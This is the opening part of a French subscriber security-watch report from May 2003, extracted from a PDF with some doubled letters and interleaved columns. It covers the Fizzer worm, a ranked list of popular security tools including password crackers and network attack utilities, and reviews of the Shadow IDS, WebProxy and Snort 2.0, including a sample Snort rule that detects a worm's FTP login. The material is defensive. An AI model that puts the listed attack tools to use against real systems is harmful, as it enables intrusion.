Veille Technologique Sécurité

Transcription

APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
8
58
N°°5
Mai 2003
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles: mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
!
"
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S--EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Mai 2003
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
RÉFÉRENCES
75
5
OUTILS DE SÉCURITÉ
5
DÉTECTION D’INTRUSION
7
ISSEC - SHADOW 1.8
7
AUDIT
7
@STAKE - WEBPROXY 2.1
SNORT 2.0
LES TECHNOLOGIES
7
8
10
ORDINATEURS PERSONNELS
10
MICROSOFT – INFRASTRUCTURE ATHENS ET BASE DE SÉCURITÉ NGSCB
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
12
12
WINDOWS 2003
12
MICROSOFT – WINDOWS 2003 SECURITY GUIDE
MICROSOFT – WS2003 & XP THREATS AND COUNTERMEASURES GUIDE
WINDOWS 2000
MICROSOFT – WINDOWS 2000 HARDENING GUIDE
PRÉVENTION
12
14
16
16
17
CMU/SEI – MISE À JOUR DU ‘CSIRT HANBOOK’
LA
10
LÉGISLATION
CRITÈRES COMMUNS
17
18
18
CC – 4IÈME CONFÉRENCE INTERNATIONALE
18
DMCA
19
DMCA – SUR LA LÉGALITÉ DES ÉQUIPEMENTS DE SÉCURITÉ
19
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
21
21
21
NORMES ET STANDARDS
LES PUBLICATIONS DE L’IETF
23
23
LES
LES
RFC
DRAFTS
NOS COMMENTAIRES
LES RFC
RFC 3526
LES DRAFTS
DRAFT-IAB-AUTH-MECH-00
DRAFT-IETF-IPSEC-IKEV2-ALGORITHMS-00
ALERTES ET ATTAQUES
ALERTES
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
SYNTHÈSE MENSUELLE
ALERTES DÉTAILLÉES
AVIS OFFICIELS
ADOBE
BEA
CISCO
ETHEREAL
GNUPG
HP
HTTP
IBM
LINUX DEBIAN
LINUX REDHAT
Veille Technologique Sécurité N°58
23
23
28
28
28
29
29
30
31
31
31
32
32
33
33
33
33
33
34
34
34
34
34
35
35
Page 2/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
MICROSOFT
NESSUS
ORACLE
POPTOP
QUALCOMM
REALNETWORKS
SCRIPTLOGIC
SGI
SUN
XINETD
35
36
36
36
36
36
36
36
37
38
ALERTES NON CONFIRMÉES
3COM
APPLE
FLOOSIETEK
IISPROTECT
KERIO
LINUX MANDRAKE
MICROSOFT
MIRABILIS
MOD_SURVEY
NETSCAPE
OPERA
SLMAIL
SLOCATE
YOUNGZSOFT
38
38
38
38
38
38
38
38
39
39
39
39
39
39
40
AUTRES INFORMATIONS
40
REPRISES D’AVIS
40
ET
CORRECTIFS
CIAC
CISCO
FREEBSD
HP
LINUX CALDERA
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
MICROSOFT
OPERA
ORACLE
SGI
SUN
40
41
41
41
41
42
42
42
42
43
43
43
43
CODES D’EXPLOITATION
43
BULLETINS ET NOTES
43
KERIO
APPLE
OPENBSD
VIRUS
ATTAQUES
OUTILS
KNOPPIX-MIB
SUBSEVEN LEGENDS "
SPAMD
TECHNIQUES
IRC IPV6 - SCAN OF THE MONTH
43
43
44
44
45
45
45
45
46
49
49
Page 3/65
Mai 2003
Le mot de la rédaction …
L’annulation des conférences qui devaient se tenir à l’occasion du salon Infosec2003 confirme une tendance qui semble engagée depuis maintenant 3 ans, celui
de la désaffection du public pour les manifestations dans le domaine de la
sécurité informatique. Deux hypothèses peuvent être formulées qui cependant
ne permettent pas d’expliquer l’ampleur de ce phénomène :
-
la disponibilité d’informations de très grande qualité sur l’Internet qui
permettent à tout un chacun d’approfondir un sujet sous réserve toutefois de
maîtriser la langue anglaise,
-
la trop grande spécialisation de ces salons alliée au trop large spectre des
conférences proposées.
Dans le cas particulier du salon Infosec, il faudra toutefois tenir compte de
l’impact des mouvements de grève et d’un mois de mai comme toujours
parsemé de jours fériés et de ponts.
Ce même mois aura vu l’apparition d’un phénomène jusqu’alors sans précédent
provoqué par le ver ‘Fizzer’. Intégrant une fonctionnalité de pilotage à distance
utilisant les canaux de communication offerts par les réseaux ‘IRC’, ce ver aura
mis à plat ceux-ci en quelques jours sans que leurs opérateurs puissent en
reprendre immédiatement le contrôle.
A cette occasion, un procédé d’éradication inédit aura vu le jour mis au point par
l’opérateur d’un petit réseau: les connexions ‘IRC’ sont interceptées par un
serveur ‘IRC’ dédié jouant le rôle d’un relais. Celui-ci joue un double rôle:
‘portail’ informant l’utilisateur ‘humain’ de la nécessité de se reconnecter sur un
autre point d’entrée, ‘sonde de collecte’ permettant d’établir la liste des
serveurs et postes infectés.
Plusieurs techniques alternatives ou complémentaires fort intéressantes sont
proposées sur la page WEB ‘http://www.debugoutput.com/fizzer/tools/’.
L’équipe de Veille Technologique
Page 4/65
Mai 2003
PR
RO
OD
DU
UIIT
TS
SE
ET
T TE
EC
CH
HN
NO
OL
LO
OG
GIIE
ES
S
LES
PRODUITS
REFERENCES
75
OUTILS DE SECURITE
# Description
Une enquête conduite en mai dernier par ‘FYODOR’ (le responsable du site ‘insecure.org’ et l’auteur
de l’outil ‘nmap’) a permis de déterminer les outils de sécurité – gratuits ou payants – les plus
couramment utilisés par les abonnés de la liste de diffusion ‘nmap-hacker’.
Quelques 1854 personnes ont ainsi répondu à cette enquête en indiquant quels étaient leurs huit utilitaires favoris
permettant d’établir une liste de 75 utilitaires et de comparer celle-ci à celle produite en l’an 2000. L’utilitaire ‘nmap’
était bien entendu hors-concours puisque le sondage était principalement adressé à des utilisateurs de cet outil.
Nous reproduisons ci-dessous la liste présentée sur le site ‘insecure.org’ en utilisant la même symbolique et la même
organisation:
- ‘C’ : Produit commercial
- ‘L’ : Fonctionne en environnement LINUX
- ‘U’ : Fonctionne en environnement OpenBSD et autres UNIX
- ‘W’ : Fonctionne en environnement Windows
Pour certains produits, le lecteur pourra se reporter aux articles publiés dans nos rapports mensuels dont le numéro
est précisé dans la colonne ‘VTS’.
N
1
C
L
U
W
Nom du produit
Nessus
Fonction
Sondage et recherche de vulnérabilités
2
Ethereal
Collecte et analyse de flux réseau
3
Snort
Détection d’intrusion
4
netcat
Connexion et transfert de flux réseau
5
TcpDump
6
hping2
Recherche d’équipements actifs
16
7
dsniff
Collecte d’information et attaque de services sécurisés
29
8
GFI LanGuard
Sondage et recherche de vulnérabilités
9
EtterCap
10
Whisker
Sondage et recherche de vulnérabilités WEB
11
John the ripper
Attaque en force des mots de passe UNIX et Windows
12
OpenSSH / SSH
Accès distant sécurisé
13
Sam Spade
Recherche dans les bases d’information Internet
20
14
ISS Internet Scanner
Outil de sondage et de recherche de vulnérabilité
15
15
Tripwire
Contrôle d’intégrité
20
16
Nikto
17
Kismet
Recherche et sondage des points d’accès Wireless
18
SuperScan
Outil de sondage des services TCP
19
L0phtCrack 4
Attaque en force des mots de passe Windows
20
Retina
21
22
NetFilter
Traceroute, …
Filtrage des accès UDP/TCP
Outils d’analyse et de test réseau
23
fport
Etat des connexions UDP/TCP sous Windows
24
Saint
25
NetworkStumbler
26
Sara
27
N-Stealth
28
AirSnort
VTS
56
57
11
36
47, 54
6
16
20
10
Page 5/65
Mai 2003
29
NBTScan
Collecte informations NetBIOS
30
GnuPG/PGP
Confidentialité
31
Firewalk
Cain & Abel
Attaque en force des mots de passe Windows
Xprobe2
Recherche et identification d’équipements actifs
34
SolarWinds toolset
Collection d’outils d’analyse et d’attaque réseau
35
Ngrep
Recherche de chaîne dans un flux réseau
36
Perl/Python
Langages de programmation
37
Thc-Amap
38
OpenSSL
Confidentialité des flux
39
ntop
Surveillance des flux
40
nemesis
Création et injection de paquets
41
LsOf
Etat des fichiers et connexions sockets
42
43
Hunt
honeyd
Collecte et manipulation de flux réseau
Pot de miel
57
44
achilles
Interception et manipulation des sessions WEB
41
45
Brutus
Attaque en force des authentifiants
46
stunnel
Tunnel SSL
50
47
Paketto Keiretsu
Manipulation des flux TCP/IP
53
48
FragRoute
Attaque réseau
49
SPIKE Proxy
Interception et manipulation des sessions WEB
50
THC-Hydra
Attaque en force des authentifiants
51
OpenBSD
Système d’exploitation sécurisé
52
TCP_Wrapper
Contrôle d’accès aux services UNIX
53
Pwdump3
Attaque en force des authentifiants Windows NT / 2K
54
LibNet
Acquisition et transmission de trames
55
IpTraf
Surveillance des flux
56
fping
57
Bastille
Sécurisation des OS Linux, Mac OsX et HP-UX
58
WinFingerprint
59
TCPTraceroute
Analyse des chemins d’accès
60
Shadow Sec. Scanner
61
pf
Filtrage des accès UDP/TCP
62
LIDS
Détection d’intrusions
63
hfchecknet
Audit de configuration Windows
64
65
etherape
dig
Surveillance des flux graphique
Interrogation DNS
66
Crack / CrackLib
Attaque en force des mots de passe UNIX
67
cheops
68
Zone alarm
Pare feu personnel
69
Visual Route
Interrogation bases de l’Internet
70
71
TCT
tcpreplay
Investigation
Création et injection de paquets
72
snoop
73
putty
Terminal SSH
74
pstools
Administration des systèmes Windows
75
arpwatch
Contrôle d’accès et surveillance des adresses
32
33
x
4
49
45
40
37
45
20, 54
51
# Complément d'information
http://www.insecure.org/tools.html
Page 6/65
Mai 2003
DETECTION D’INTRUSION
ISSEC - SHADOW 1.8
# Description
En 1994, le projet ‘CIDER’ - Cooperative Intrusion Detection Evaluation and Response –
était initié aux Etats-Unis dans l’optique d’identifier, de documenter voire d’améliorer les logiciels de
sécurité existants dont, en particulier, les outils de détection d’intrusion.
L’effort conjoint de quelques organisations gouvernementales (le SANS, la NSA et le NSWC) et
d’une société spécialisée dans ce domaine (NFR – Network Flight Recorder) a permis d’engager le
projet ‘SHADOW’ – Secondary Heuristic Analysis for Defensive Inline Warfare - visant à
développer un outil de détection d’intrusion simple, innovant (et toujours efficace en 2003).
Ce projet a notamment eu pour résultat la publication dès 1996 de l’outil ‘Shadow’ permettant d’identifier les
tentatives d’attaques coordonnées et furtives:
- ‘attaques coordonnées’ car issues de sources multiples mais partageant une même stratégie,
- ‘attaques furtives’ car réparties dans le temps pour ne pas déclencher les systèmes de détection basés sur un seuil.
Pour cela, ‘Shadow’ ne s’intéresse aucunement au contenu des paquets mais uniquement à la chronologie de ceux-ci
en appliquant un procédé d’analyse statistique à long terme. Celui-ci autorise le filtrage des événements à faible durée
de vie en mettant en évidence le ‘bruit de fond’ généralement non étudié ainsi que la corrélation entre évènements
issus de sources différentes.
Fonctionnant sur plates-formes LINUX, et plus particulièrement sur la distribution ‘RedHat’, cet outil majoritairement
écrit en langage ‘perl’ utilise une infrastructure de type ‘sondes/console’ ou ‘sensor/analyser’ pour reprendre la
terminologie originale:
- les sondes distribuées sur le(s) réseau(x) devant être surveillés collectent les trames au moyen de l’outil, ‘tcpdump’
et assurent le pré-traitement de celles-ci,
- la console est chargée de la collecte périodique des événements produits par les sondes pour analyse statistique et
présentation des résultats consultables via une interface WEB.
Cet outil est toujours maintenu par les laboratoires du ‘NSWC’ ou ‘Naval Surface Warfare Center’, une division de
la marine américaine spécialisée dans la contre-mesure et la guerre électronique. Ainsi, 20 mois après la parution de
la version 1.7, le ‘NSWC’ vient d’annoncer la disponibilité de la version 1.8. Il s’agit cependant d’une version de
maintenance qui, bien que n’apportant aucune nouvelle fonctionnalité, corrige quelques bogues et simplifie la
configuration.
Outil fortement ‘textuel’ donc quelque peu à la traîne par rapport au marché, ‘Shadow’ requiert un travail conséquent
de configuration notamment vis à vis des filtres, tous exprimés en respectant la syntaxe ‘tcpdump’ dont on ne peut
dire qu’elle soit simple à utiliser. Cependant, et sous réserve de maintenir à jour les différents utilitaires externes
employés dont ‘tcpdump’ et ‘nmap’, ‘shadow’ permettra la mise en évidence d’évènements généralement passés
sous silence car statistiquement bien en dessous du seuil de détection des outils classiques.
Rappelons enfin l’absolue nécessité de synchroniser toutes les sondes afin de garantir la fiabilité du processus de
corrélation.
http://www.nswc.navy.mil/ISSEC/CID/
http://www.nswc.navy.mil/ISSEC/CID/Install.pdf
http://www.isp-planet.com/services/ids/shadow.html
Site d’accueil
Documentation
Etude du produit
AUDIT
@STAKE - WEBPROXY 2.1
# Description
En janvier 2003, la société ‘@stake’ annonçait l’arrêt du support de la version gratuite de
l’utilitaire ‘WebProxy 1.0’ au profit de la distribution d’une nouvelle version commerciale
accessible à des coûts allant de $995 pour 1 licence à $21000 pour 25 licences.
Rappelons que ‘WebProxy’ permet d’analyser les échanges effectués entre un navigateur et un site ‘WEB’ en
s’intercalant de manière totalement transparente dans la session. L’utilisateur pourra ainsi non seulement collecter les
données échangées mais aussi modifier celles-ci avant d’étudier la réaction du site ‘WEB’ face à des requêtes
inattendues ou rejouées.
Une nouvelle version vient d’être diffusée qui corrige divers bogues et intègre trois nouvelles fonctions fort utiles:
1. La possibilité de suivre n’importe quel lien sur une quelconque profondeur et d’automatiquement identifier les
formulaires ainsi que les pages d’erreurs,
2. Le support de la méthode d’authentification dite ‘NTLM’ permettant de tester les sites ‘WEB’ utilisant ou
requerrant l’utilisation de celle-ci,
3. Le contrôle de la présence de fichiers et de pages pouvant présenter un risque de sécurité – fonction ‘Forced
Page 7/65
Mai 2003
Browsing’ - notamment dans les environnements : ‘ColdFusion’, ‘Domino’, ‘IIS’.
Pour en savoir plus sur ce remarquable outil, le lecteur pourra se reporter à notre article de présentation publié dans le
rapport de veille N°54 (Janvier 2003) mais aussi à la documentation désormais directement accessible en ligne sur le
site de l’éditeur.
http://www.atstake.com/webproxy/
http://www.atstake.com/webproxy/doc/
Site d’accueil
Documentation en ligne
SNORT 2.0
# Description
‘Snort’ est un célèbre outil de détection d’intrusion réseau accessible gratuitement, capable de faire de la détection
d’intrusion en temps réel mais aussi de la capture de paquets IP. Déjà présenté à travers nos analyses des ‘défis
honeynet’, nous nous proposons de détailler les nouveautés apparues avec la version 2.0, non sans avoir
préalablement rappelé le principe de fonctionnement général de cet outil.
‘Snort’ peut être utilisé de trois manières :
# En tant qu’analyseur réseau: à l’instar d’un ‘tcpdump’ ou d’un ‘snoop’, il permet de visualiser un certain nombre
d’informations sur les paquets transitant sur le réseau,
# En outil de capture de paquets: il permet d’enregistrer tous les paquets transitant sur le réseau, avec la possibilité
d’affiner la capture au moyen de filtres,
# Comme sonde de détection d’intrusions réseau: il recherche les signatures d’attaques connues en s’appuyant sur
une base de règles.
Analyseur Réseau
En mode analyseur réseau, ‘Snort’ lit et décode tous les paquets qu’il capture sur le réseau puis les imprime sur la
sortie standard. En cumulant les options –v et –d on peut obtenir une visualisation de la totalité des données
circulant sur le réseau.
Exemple d’utilisation de Snort en mode analyseur réseau
On peut également sélectionner une partie
du trafic grâce à l’utilisation de filtres #./snort -v -d not port 22
Running in packet dump mode
spécifiques.
Log directory = /var/log/snort
Dans ce mode, ‘Snort’ donne un certain Initializing Network Interface eth0
--== Initializing Snort ==-nombre d’informations relatives aux entêtes
Initializing Output Plugins!
des paquets, ainsi qu’une représentation Decoding Ethernet on interface eth0
hexadécimale et ASCII de la zone de
--== Initialization Complete ==--*> Snort! <*données des paquets.
Version 2.0.0 (Build 72)
Les informations fournies, plus détaillées que By Martin Roesch ([email protected], www.snort.org)
celles retournées par ‘tcpdump’, mettent 05/19-15:10:12.511262 ARP who-has xx.xx.xx.161 tell xx.xx.xx.24
directement en évidence les éléments 05/19-15:10:12.552113 ARP who-has xx.xx.xx.221 tell xx.xx.xx.72
05/19-15:10:12.661080 xx.xx.xx.29:1347 -> xx.xx.xx.255:7938
pertinents dans les en-têtes des paquets.
UDP TTL:128 TOS:0x0 ID:25418 IpLen:20 DgmLen:84
On notera que la taille des paquets capturés Len: 56
est, par défaut, celle du ‘MTU’ – Maximum 3E C9 5B 84 00 00 00 00 00 00 00 02 00 01 86 A0 >.[.............
Tranfer Unit – de l’interface sur laquelle 00 00 00 02 00 00 00 05 00 00 00 00 00 00 00 00 ................
‘Snort’ écoute. Ce fonctionnement est à 00 00 00 00 00 00 00 00 00 05 F3 DD 00 00 00 02 ................
00 00 00 00 00 00 00 00
........
l’opposé de celui de ‘tcpdump’ qui, lui, =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
utilise par défaut une taille fixe sans tenir 05/19-15:10:12.661435 xx.xx.xx.29:1347 -> xx.xx.xx.255:111
compte des caractéristiques du média UDP TTL:128 TOS:0x0 ID:25420 IpLen:20 DgmLen:84
Len: 56
physique.
3E C9 5B 84 00 00 00 00 00 00 00 02 00 01 86 A0 >.[.............
On remarquera cependant que ‘Snort’ n’est 00 00 00 02 00 00 00 05 00 00 00 00 00 00 00 00 ................
pas souvent utilisé comme analyseur réseau, 00 00 00 00 00 00 00 00 00 05 F3 DD 00 00 00 02 ................
........
la fonction lui étant généralement attribuée 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
étant la détection d’intrusion.
Capture de paquets
Utilisé dans ce mode, ‘Snort’ enregistre tous les paquets qu’il voit dans une forme décodée en ASCII. Ce mode est
activé en utilisant l’option –l qui permet de spécifier le répertoire dans lequel enregistrer les paquets. Un répertoire
est créé par adresse IP source ou destination (en fonction des options choisies), et les paquets concernant chaque
connexion enregistrée sont rangés dans le répertoire correspondant à la source ou destination de la connexion.
Notons qu’il est également possible d’enregistrer les paquets sous forme binaire plutôt que sous forme décodée en
ASCII, ce qui permettra leur étude ultérieure avec des outils comme ‘Ethereal’, ‘Sniffer Pro’, … ou tout autre outil
d’analyse graphique.
Il est possible d’utiliser conjointement le mode analyseur de paquets et le mode capture, mais il faut garder en tête
que les performances au niveau de l’enregistrement peuvent être impactées par la lenteur du terminal.
Ce mode est le plus couramment utilisé. ‘Snort’ passe en mode «détection d’intrusion» à partir du moment où un
fichier de configuration lui est spécifié.
Page 8/65
Mai 2003
On indiquera dans celui-ci les différentes options de fonctionnement de la sonde de détection d’intrusion, comme le
format d’export des données, les règles à utiliser, les différents pré-processeurs devant être activés ainsi que leurs
options de fonctionnement, etc …
Les différents modules qui composent la sonde de détection d’intrusion sont les suivants :
Snort decoder
Le décodeur permet de paramétrer la finesse de la remontée d’alertes sur la nature et la normalité du trafic
observé. On peut ainsi désactiver les alertes sur l’utilisation d’options expérimentales ou obsolètes dans les entêtes TCP de paquets, mais également sur l’utilisation d’options dans les paquets IP.
Moteur de détection
Il est possible de configurer le moteur de détection de Ex :
manière à optimiser l’utilisation des ressources même sur # Configure the detection engine
# ===============================
des petites configurations.
# Use a different pattern matcher in case you have a
Par l’utilisation de mots clefs, on adapte en fait le mode de # machine with very limited resources:
# config detection: search-method lowmem
fonctionnement de ‘Snort’ à la configuration que l’on a.
‘frag2’
Pré-processeur de dé-fragmentation IP
Ce pré-processeur permet de détecter les attaques de fragmentation (habituellement des dénis de service),
mais également les tentatives de recouvrement de fragment destinées à court-circuiter le mécanisme de filtrage
mis en œuvre sur certains équipements ne gérant pas correctement ce type de paquets.
‘stream4’ :
Pré-processeur d’inspection à état
Ce pré-processeur permet la détection de signatures d’attaques uniquement dans des connexions établies. Il est
ainsi possible d’éliminer les tentatives de saturation de la sonde visant à consommer toutes les ressources du
système hébergeant la sonde, généralement en envoyant un grand nombre de paquets contenant des chaînes
correspondant à des signatures d’attaques connues !
Il permet également de détecter différents types de sondage de ports avec la possibilité de déterminer le
système d’exploitation par l’analyse des empreintes spécifiques à la pile TCP/IP du système distant.
La directive stream4_reassemble permet de définir les flux qui devront être ré-assemblés. Par défaut, seuls le
sont ceux allant du client vers le serveur.
‘http_decode’
Pré-processeur de normalisation des requêtes HTTP
Ce processeur permet de normaliser les requêtes HTTP émises à destination de serveurs surveillés par la
sonde, en remplaçant toutes les occurrences de types ‘%XX’ par l’équivalent ASCII. Ceci permet de détecter les
tentatives de dissimulation d’attaques par de multiples encodages des requêtes.
‘rpc_decode’
Pré-processeur de normalisation des requêtes RPC
Les requêtes RPC peuvent utiliser différents encodages, en dehors de l’encodage sur 4 octets habituels. Ce préprocesseur travaille de manière similaire à http_decode, et permet de détecter les tentatives de dissimulation
d’attaques sur des RPC (Remote Processus Call ou Appel Distant de Procédure).
‘bo_detector’
Détecteur de trafic Back Orifice
Ce processeur détecte la présence de trafic Back Orifice dans les flux observés. Notons qu’avec la version 2.0, il
est désormais plus nécessaire de spécifier un port TCP pour identifier le trafic Back Orifice.
Pour mémoire, Back Orifice est un outil de prise de contrôle à distance utilisable sur des plates-formes win32,
très en vogue il y a quelques temps, et présent dans de nombreux chevaux de Troie.
‘telnet_decode’
Normalisation des chaînes de négociation de connexion telnet
Ce pré-processeur normalise les chaînes de négociation des connexions ‘telnet’ pour les flux telnet mais aussi
ftp. Il fonctionne d’une manière similaire à rpc_decode et http_decode.
Il recherche dans le trafic les données non conformes aux spécifications, et remplace celles-ci par une
représentation normalisée, autorisant ainsi une détection de signature générique, car indépendante de toutes
les différentes possibilités d’encodage des données.
‘portscan’
Pré-processeur de détection de sondage tcp / udp
Ce pré-processeur permet de détecter les paquets UDP ou les TCP SYN (demande de connexion) à destination
d’un nombre configurable de ports dans un laps de temps lui aussi paramétrable, ce type d’activité étant en
effet révélateur d’un sondage de ports.
Une directive permet de spécifier les machines pour lesquelles il ne faudra pas annoncer la détection d’un
sondage, typiquement les serveurs DNS. En effet dans le cas de plusieurs requêtes successives, le serveur DNS
renverra plusieurs paquets UDP ayant des ports ‘destination’ différents à l’attention de la machine ayant
effectué les requêtes avec donc le risque de déclencher une alerte par erreur.
Observons que les sondages furtifs TCP seront déjà détectés par le module stream4.
‘arpspoof’
Détection expérimentale d’attaques ARP
Ce pré-processeur permet de détecter les attaques visant à provoquer la corruption des caches ARP des
équipements réseau dans le but de détourner du trafic. Une attaque de type «man in the middle» au niveau
ARP permet de prendre complètement le contrôle des données échangées si la couche de transport ne garantie
pas l’intégrité des données.
Notons toutefois que l’utilisation de ce pré-processeur n’est pas conseillée, car il est annoncé dans l’état
expérimental. De plus son utilisation implique de définir toutes les correspondances IP / MAC autorisées, ce qui
peut être fastidieux dans le cas d’un réseau de production.
‘conversation’, ‘portscan2’ Nouveau pré-processeur de détection de sondage
Le pré-processeur portscan2 permet de détecter les tentatives de sondage TCP,UDP ou ICMP en s’appuyant
Page 9/65
Mai 2003
sur un pré-processeur de surveillance des «conversations» (le terme connexion n’a de sens qu’avec TCP), et
une définition de seuils statistiques. En cas de dépassement de l’un des ces seuils, le pré-processeur remonte
une alerte.
Il est possible de faire figurer dans une «whitelist» les machines à ne pas comptabiliser, comme par exemple
les serveurs DNS.
Règles
Les règles définissent les signatures d’attaques Exemple de règle:
# suspicious login attempts
à détecter.
alert tcp $EXTERNAL_NET any -> $HOME_NET 21
Elles sont classées par catégories:
(msg:"FTP ADMw0rm ftp login attempt";
- pop2.rules contient toutes les règles
flow:to_server,established;
relatives à des attaques sur le protocole pop2
content:"USER w0rm|0D0A|";
et ses différentes implémentations logicielles,
reference:arachnids,01;
- web-iis.rules contient les signatures
sid:144;
d’attaques impactant des serveurs IIS,
classtype:suspicious-login;
- ...
rev:6;)
Export de données
‘Snort’ dispose de plusieurs formats d’export de données pour la représentation des alertes remontées par les
différents pré-processeurs que nous venons de lister. Cela va du simple fichier texte récapitulatif à l’export dans
des bases de données, permettant ensuite l’exploitation centralisée des alertes, au moyen de consoles de
centralisation.
Parmi les solutions centralisées de gestion de sondes ‘Snort’, on notera ACID, un produit libre, mais également
DEMARC qui est un produit commercial permettant la gestion des alertes remontées et la configuration des
agents ‘Snort’. Dans le cadre d’une utilisation personnelle, DEMARC propose une version gratuite de leur
solution.
La fonctionnalité de détection d’intrusion de ‘Snort’ a fait de ce projet un des plus répandus du monde OpenSource
dans les milieux de la sécurité. ‘Snort’ est en effet souvent en «compétition» avec d’autres produits commerciaux, et
même souvent intégré dans des produits commerciaux. Les signatures d’attaques développées pour ‘Snort’ sont
désormais exploitables par différentes sondes de détection d’intrusion dont ‘Dragon’, ou encore ‘RealSecure’.
Les nouveautés apportées par la version 2.0 concernent principalement l’écriture des pré-processeurs ‘Portscan2’ – le
pré-processeur ‘PortScan1’ étant abandonné - et ‘Conversation’ mais aussi la correction de nombreux bugs et de la
faille de sécurité concernant les versions antérieures ou égales à 1.9.1. Cette faille permet d’exécuter du code avec les
privilèges de ‘root’. Notons également qu’un gros travail sur l’écriture de règles et la réécriture de règles existantes a
été effectué.
http://www.snort.org
http://www.demarc.com
http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.html
http://www.securityfocus.com/infocus/1577
LES
Site officiel du projet Snort
Editeur de solutions intégrant Snort
Site officiel du projet ACID
IDS detection evasion paper
TECHNOLOGIES
ORDINATEURS PERSONNELS
MICROSOFT – INFRASTRUCTURE ATHENS ET BASE DE SECURITE NGSCB
# Description
Le prototype d’une nouvelle architecture de PC portant le nom de code ‘athens’ a été dévoilé par Bill Gates durant la
12ième conférence annuelle ‘WinHEC’ – Windows Hardware Engineering Conference – qui s’est tenue du 6 au 8
mai dernier à la Nouvelle Orléans.
L’objectif de cette présentation était de démontrer que les futures innovations dans ce domaine ne pouvaient voir le
jour qu’à la condition de développer conjointement le matériel et le logiciel. Cette prise de position – antagonique de la
position jusqu’alors tenue par Microsoft – semble fortement liée à l’initiative ‘Trustworthy Computing’ visant à
intégrer les fonctionnalités de sécurité au plus bas niveau des architectures systèmes. Dans cette logique, en effet, il
apparaît difficile de découpler, comme cela était jusqu’alors le cas, le développement du matériel et la conception du
système d’exploitation.
Dans l’optique de faciliter mais aussi de promouvoir cette nouvelle stratégie, Microsoft annonce la création du site
‘Windows Hardware and Driver Central’ - ou ‘WHDC’ - regroupant l’ensemble des informations permettant de
garantir la conformité des développements vis à vis des spécifications édictées par l’éditeur. Encore à l’état
embryonnaire, ce site rassemble déjà de nombreux documents et outils dont certains n’étaient jusqu’alors accessibles
que par le biais des distributions ‘SDK’ (Software Developpement Kit) et ‘DDK’ (Driver Developpement Kit).
Le lecteur intéressé par les technologies employées dans les architectures existantes et futures trouvera sur ce site les
spécifications des différentes infrastructures matérielles (PC mobile, Plates-formes 64 bits, …), des bus de
Page 10/65
Mai 2003
communication (PCI, FireWire, USB2) ou encore de différents constituants dédiés (affichage, gestion de l’alimentation,
multimédia, réseaux, stockage, …).
Une part importante de la conférence ‘WinHEC’ semble avoir été consacrée à la stratégie développée par Microsoft
dans le cadre de l’initiative ‘Trustworthy Computing’ et jusqu’alors connue du grand public sous le nom de code
‘Palladium’.
En reprenant le concept de ‘TCB’ – Trusted
Computing Base – élaboré dans les années 70
et fondement des principes décrits dans le
célèbre ‘Orange Book’ du DoD Américain,
Microsoft se propose de regrouper toutes les
fonctions critiques de sécurité au sein d’une
unité décisionnelle dénommée ‘NGSCB’ ou Next
Generation Secure Computing Base.
Implémentée
au
plus
bas
niveau
de
l’architecture, probablement sous la forme d’un
ensemble de composants spécialisés,
la
‘NGSCB’ doit répondre à des objectifs
identiques à ceux de la ‘TCB’ du DoD: renforcer
le niveau de sécurité en plaçant les éléments de
sécurité essentiels – données, clefs, fonctions
de décision – hors de portée de l’utilisateur et
des programmes s’exécutant sous son autorité.
Image extraite de la présentation Microsoft
La mise en application des principes de séparation des fonctions et de cloisonnement des contextes rendra ainsi plus
difficile le détournement des fonctions par un code ‘illicite’ ou ‘non autorisé’. Intervenant dès l’initialisation du matériel,
la ‘NGSCB’ aura notamment en charge le contrôle de l’intégrité et de la provenance des composants logiciels avant
chargement de ceux-ci. En l’absence d’une signature valide, ceux-ci ne pourront être chargés ...
Sur le plan théorique, cette initiative ne peut qu’aller dans le sens d’une amélioration du niveau de sécurité à condition
toutefois que la position dominante de Microsoft sur le marché ne conduise pas à mettre en place un système dont
toutes les clefs seraient détenues par le concepteur de l’architecture. Les levées de bouclier qui ont fait suite à la
première présentation de 'Palladium’ nous confirment les craintes des utilisateurs d’être à ‘la merci’ d’un fournisseur
et de ne plus pouvoir librement installer un système d’exploitation alternatif...
On notera que, bien qu’une première présentation du code de ‘NGSCB’ ait été effectuée durant la conférence
‘WinHEC’, aucune date n’a encore été annoncée par Microsoft vis à vis de la disponibilité d’un système d’exploitation
tirant parti de cette nouvelle architecture.
http://www.microsoft.com/presspass/press/2003/may03/05-06WinHEC2003KeynotePR.asp
http://www.microsoft.com/presspass/events/winhec/default.asp
http://www.microsoft.com/whdc/hwdev/platform/pcdesign/athPC.mspx
http://www.microsoft.com/presspass/features/2003/may03/05-07NGSCB.asp
http://www.microsoft.com/presspass/exec/craig/10-02trustworthywp.asp
Page 11/65
Mai 2003
IN
NF
FO
